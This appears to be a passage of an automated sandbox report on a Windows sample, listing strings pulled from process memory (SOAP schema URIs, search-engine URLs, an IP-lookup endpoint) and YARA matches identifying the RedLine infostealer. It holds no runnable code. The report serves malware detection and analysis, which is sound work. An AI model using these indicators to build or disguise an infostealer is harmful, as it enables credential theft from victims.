                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, bAS06bx.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          barindex
                          Source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00971F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_001A1F90
